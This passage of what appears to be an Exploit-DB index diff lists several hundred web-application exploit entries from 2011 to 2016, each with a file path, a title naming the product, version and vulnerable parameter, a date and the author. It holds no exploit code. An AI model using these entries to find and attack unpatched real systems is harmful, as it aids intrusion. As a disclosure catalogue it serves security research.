+36283,exploits/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Cross-Site Scripting",2011-11-03,"Stefan Schurtz",webapps,php, +36280,exploits/php/webapps/36280.txt,"Symphony 2.2.3 - '/symphony/publish/images?filter' Cross-Site Scripting",2011-11-01,"Mesut Timur",webapps,php, +36281,exploits/php/webapps/36281.txt,"Symphony 2.2.3 - '/symphony/publish/comments?filter' SQL Injection",2011-11-01,"Mesut Timur",webapps,php, +36284,exploits/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,webapps,asp, +36286,exploits/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",webapps,hardware, +36287,exploits/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Cross-Site Scripting",2011-11-04,3spi0n,webapps,php, +36289,exploits/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,webapps,php, +36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php, +36292,exploits/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Directory Traversal",2011-11-07,Buherátor,webapps,java, +36293,exploits/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Remote Command Execution",2011-11-04,"Christophe de la Fuente",webapps,php, +36295,exploits/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,webapps,php, +36297,exploits/php/webapps/36297.txt,"AShop - Open Redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",webapps,php, +36298,exploits/php/webapps/36298.txt,"Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",webapps,php, +36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java, +36301,exploits/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",webapps,php, +36302,exploits/php/webapps/36302.txt,"Joomla! Component Content - 'year' SQL Injection",2011-11-14,E.Shahmohamadi,webapps,php, +36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80 +36305,exploits/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",webapps,php, +36306,exploits/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,webapps,php, +36307,exploits/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - 'admin_index.php?site_name' Cross-Site Scripting",2011-11-13,"Gjoko Krstic",webapps,php, +36308,exploits/php/webapps/36308.txt,"Webistry 1.6 - 'pid' SQL Injection",2011-11-16,CoBRa_21,webapps,php, +36314,exploits/php/webapps/36314.txt,"webERP 4.3.8 - '/reportwriter/ReportMaker.php?reportid' SQL Injection",2011-11-17,"High-Tech Bridge SA",webapps,php, +36315,exploits/php/webapps/36315.txt,"webERP 4.3.8 - '/reportwriter/FormMaker.php?ReportID' SQL Injection",2011-11-17,"High-Tech Bridge SA",webapps,php, +36316,exploits/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",webapps,php, +36317,exploits/php/webapps/36317.txt,"WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting",2011-11-17,Am!r,webapps,php, +36320,exploits/php/webapps/36320.txt,"CodoForum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",webapps,php,80 +36321,exploits/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,webapps,php,80 +36322,exploits/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' SQL Injection",2011-11-20,tempe_mendoan,webapps,php, +36323,exploits/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,webapps,php, +36324,exploits/php/webapps/36324.txt,"WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting",2011-11-21,Amir,webapps,php, +36325,exploits/php/webapps/36325.txt,"WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting",2011-11-21,Am!r,webapps,php, +36326,exploits/php/webapps/36326.txt,"WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting",2011-11-21,Amir,webapps,php, +36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php, +36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php, +36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php, +36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php, +36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, +36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, +36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php, +36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php, +36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php, +36341,exploits/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,webapps,php, +40008,exploits/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,webapps,php,80 +36342,exploits/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/googlemap.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,webapps,php, +36343,exploits/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition' Cross-Site Scripting",2011-11-23,Prestashop,webapps,php, +36344,exploits/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,webapps,php, +36345,exploits/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,webapps,php, +36346,exploits/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,webapps,php, +36347,exploits/php/webapps/36347.txt,"Hastymail2 - 'rs' Cross-Site Scripting",2011-11-22,HTrovao,webapps,php, +36348,exploits/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,webapps,php, +36349,exploits/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,webapps,php, +36350,exploits/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php?hal' SQL Injection",2011-11-24,X-Cisadane,webapps,php, +36351,exploits/php/webapps/36351.txt,"Balitbang CMS 3.3 - 'alumni.php?hal' SQL Injection",2011-11-24,X-Cisadane,webapps,php, +36353,exploits/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - '/nnm/mibdiscover?node' Cross-Site Scripting",2011-11-24,anonymous,webapps,jsp, +36354,exploits/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/configurationpoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,webapps,jsp, +36355,exploits/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/ping.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,webapps,jsp, +36356,exploits/jsp/webapps/36356.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/statuspoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,webapps,jsp, +36357,exploits/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/traceroute.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,webapps,jsp, +36358,exploits/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",webapps,php, +36362,exploits/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,webapps,php, +36363,exploits/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting",2011-11-28,Amir,webapps,php, +36364,exploits/php/webapps/36364.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,webapps,php, +36365,exploits/php/webapps/36365.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,webapps,php, +36366,exploits/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,webapps,php, +36367,exploits/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,webapps,php, +36368,exploits/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",webapps,php, +36369,exploits/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",webapps,xml, +36371,exploits/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",webapps,php, +36372,exploits/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,webapps,php, +36373,exploits/php/webapps/36373.txt,"Joomla! Component com_simplephotogallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,webapps,php, +36374,exploits/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,webapps,php, +36375,exploits/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",webapps,asp, +36379,exploits/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-30,"High-Tech Bridge SA",webapps,php, +36380,exploits/php/webapps/36380.txt,"OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php' URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",webapps,php, +36381,exploits/php/webapps/36381.txt,"OrangeHRM 2.6.11 - '/lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",webapps,php, +36382,exploits/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,webapps,php, +36383,exploits/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,webapps,php, +36384,exploits/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",webapps,php, +36385,exploits/php/webapps/36385.txt,"Joomla! Component com_simplephotogallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",webapps,php, +36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",webapps,php, +36406,exploits/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php?task' Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",webapps,php, +36481,exploits/php/webapps/36481.txt,"WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,webapps,php, +36407,exploits/php/webapps/36407.txt,"Elxis CMS 2009 - 'administrator/index.php' URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",webapps,php, +36408,exploits/php/webapps/36408.txt,"WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,webapps,php, +36410,exploits/php/webapps/36410.txt,"Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,webapps,php, +36413,exploits/php/webapps/36413.txt,"WordPress Plugin SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",webapps,php, +36401,exploits/php/webapps/36401.txt,"AtMail 1.04 - 'func' Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,webapps,php, +36402,exploits/asp/webapps/36402.txt,"Hero 3.69 - 'month' Cross-Site Scripting",2011-12-01,"Gjoko Krstic",webapps,asp, +36414,exploits/php/webapps/36414.txt,"WordPress Plugin WPML 3.1.9 - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",webapps,php,80 +36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,webapps,php, +36483,exploits/php/webapps/36483.txt,"WordPress Plugin WP Live.php 1.2.1 - 's' Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",webapps,php, +36484,exploits/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",webapps,php, +36485,exploits/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting",2012-01-02,sonyy,webapps,php, +36486,exploits/php/webapps/36486.txt,"Tienda Virtual - 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",webapps,php, +36418,exploits/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,webapps,php, +36419,exploits/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",webapps,multiple,3790 +36423,exploits/java/webapps/36423.txt,"Websense Appliance Manager - Command Injection",2015-03-18,"Han Sahin",webapps,java,9447 +36432,exploits/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,webapps,php, +36434,exploits/php/webapps/36434.txt,"WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,webapps,php, +36435,exploits/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",webapps,php,80 +36436,exploits/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",webapps,java, +36439,exploits/php/webapps/36439.txt,"Joomla! Component ECommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",webapps,php,80 +36440,exploits/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",webapps,java,58080 +36441,exploits/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",webapps,xml,8443 +36442,exploits/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",webapps,linux, +36444,exploits/php/webapps/36444.txt,"WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,webapps,php, +36445,exploits/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,webapps,php, +36446,exploits/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",webapps,php, +36447,exploits/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",webapps,php, +36448,exploits/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",webapps,php, +36449,exploits/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",webapps,php, +36450,exploits/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",webapps,php, +36451,exploits/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",webapps,php, +40870,exploits/php/webapps/40870.txt,"WordPress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",webapps,php, +36453,exploits/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",webapps,php, +36454,exploits/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",webapps,php, +36456,exploits/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",webapps,php, +36457,exploits/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",webapps,cgi, +36458,exploits/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",webapps,cgi, +36459,exploits/cgi/webapps/36459.txt,"Websense 7.6 Products - 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",webapps,cgi, +36460,exploits/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' SQL Injection",2011-12-17,Lazmania61,webapps,php, +36461,exploits/php/webapps/36461.txt,"Social Network Community 2 - 'userID' SQL Injection",2011-12-17,Lazmania61,webapps,php, +36462,exploits/php/webapps/36462.txt,"Video Community Portal - 'userID' SQL Injection",2011-12-18,Lazmania61,webapps,php, +36463,exploits/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,webapps,php, +36464,exploits/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",webapps,php, +36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",webapps,php, +36468,exploits/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Cross-Site Scripting",2011-12-19,G13,webapps,php, +36469,exploits/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' SQL Injection",2011-12-20,CoBRa_21,webapps,php, +36470,exploits/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection",2011-12-20,"Stefan Schurtz",webapps,php, +36471,exploits/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injections",2011-12-20,"High-Tech Bridge SA",webapps,php, +36472,exploits/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' SQL Injection",2011-12-20,CoBRa_21,webapps,php, +36473,exploits/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' SQL Injection",2011-12-20,"Benjamin Kunz Mejri",webapps,php, +36474,exploits/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",webapps,php, +36478,exploits/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,webapps,php, +36506,exploits/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",webapps,php, +36487,exploits/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Cross-Site Scripting",2012-01-03,"The Evil Thinker",webapps,php, +36488,exploits/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting",2012-01-03,Atmon3r,webapps,php, +36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",webapps,php, +36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",webapps,php, +36492,exploits/php/webapps/36492.txt,"GraphicsClone Script - 'term' Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,webapps,php, +36493,exploits/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",webapps,php, +36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",webapps,php, +36495,exploits/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' SQL Injection",2011-12-29,SiteWatch,webapps,php, +36496,exploits/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,webapps,php, +36497,exploits/php/webapps/36497.txt,"UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting",2012-01-04,sonyy,webapps,php, +36498,exploits/php/webapps/36498.txt,"Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,webapps,php, +36499,exploits/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,webapps,php, +36508,exploits/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",webapps,php, +36509,exploits/php/webapps/36509.txt,"SQLiteManager 1.2.4 - 'main.php?dbsel' Cross-Site Scripting",2012-01-05,"Stefan Schurtz",webapps,php, +36510,exploits/php/webapps/36510.txt,"SQLiteManager 1.2.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-05,"Stefan Schurtz",webapps,php, +36512,exploits/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Directory Traversal",2012-01-06,"Chokri B.A",webapps,php, +36515,exploits/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 - Cross-Site Scripting / SQL Injection",2012-01-07,"BHG Security Center",webapps,asp, +36520,exploits/php/webapps/36520.txt,"Berta CMS - Arbitrary File Upload",2015-03-27,"Simon Waters",webapps,php,80 +36521,exploits/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - 'gallery_e.php?id' SQL Injection",2012-01-07,"BHG Security Center",webapps,php, +36522,exploits/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - 'pageH.php?id' SQL Injection",2012-01-07,"BHG Security Center",webapps,php, +36523,exploits/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - 'pageE.php?id' SQL Injection",2012-01-07,"BHG Security Center",webapps,php, +36524,exploits/php/webapps/36524.txt,"Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36525,exploits/php/webapps/36525.txt,"Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36526,exploits/php/webapps/36526.txt,"Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36527,exploits/php/webapps/36527.txt,"Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36528,exploits/php/webapps/36528.txt,"Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36529,exploits/php/webapps/36529.txt,"Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36530,exploits/php/webapps/36530.txt,"Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,webapps,php, +36531,exploits/php/webapps/36531.txt,"Clipbucket 2.6 - 'videos.php?time' SQL Injection",2012-01-09,YaDoY666,webapps,php, +36532,exploits/php/webapps/36532.txt,"Clipbucket 2.6 - 'channels.php?time' SQL Injection",2012-01-09,YaDoY666,webapps,php, +36534,exploits/php/webapps/36534.txt,"Marinet CMS - 'room2.php?roomid' SQL Injection",2012-01-09,"H4ckCity Security Team",webapps,php, +36535,exploits/php/webapps/36535.txt,"Marinet CMS - 'galleryphoto.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",webapps,php, +36536,exploits/php/webapps/36536.txt,"Marinet CMS - 'gallery.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",webapps,php, +36538,exploits/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting",2012-01-09,sonyy,webapps,php, +36539,exploits/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,webapps,php, +36540,exploits/php/webapps/36540.txt,"WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection",2012-01-10,"Gianluca Brindisi",webapps,php, +36541,exploits/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,webapps,php, +36543,exploits/php/webapps/36543.txt,"KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",webapps,php, +36544,exploits/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",webapps,php, +36547,exploits/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",webapps,asp, +36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,webapps,java, +36549,exploits/php/webapps/36549.txt,"Joomla! Component com_contushdvideoshare 1.3 - 'id' SQL Injection",2012-01-12,Lazmania61,webapps,php, +36550,exploits/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,webapps,php, +36551,exploits/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,webapps,php, +36552,exploits/php/webapps/36552.txt,"BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",webapps,php, +36553,exploits/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,webapps,java, +36554,exploits/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",webapps,php, +36559,exploits/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,webapps,php, +36560,exploits/php/webapps/36560.txt,"Joomla! Component com_gallery_wd - SQL Injection",2015-03-30,CrashBandicot,webapps,php, +36561,exploits/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",webapps,php, +36565,exploits/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",webapps,php, +36566,exploits/php/webapps/36566.txt,"Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",webapps,php, +36567,exploits/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",webapps,php, +36568,exploits/php/webapps/36568.txt,"Giveaway Manager - 'members.php' Cross-Site Scripting",2012-01-16,Am!r,webapps,php, +36569,exploits/php/webapps/36569.txt,"Annuaire PHP - 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,Atmon3r,webapps,php, +36572,exploits/php/webapps/36572.txt,"Toner Cart - 'show_series_ink.php' SQL Injection",2012-01-18,Lazmania61,webapps,php, +36573,exploits/php/webapps/36573.txt,"MMORPG Zone - 'view_news.php' SQL Injection",2012-01-18,Lazmania61,webapps,php, +36574,exploits/php/webapps/36574.txt,"Freelance Zone - 'show_code.php' SQL Injection",2012-01-18,Lazmania61,webapps,php, +36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple, +36576,exploits/php/webapps/36576.txt,"WordPress Plugin SP Project & 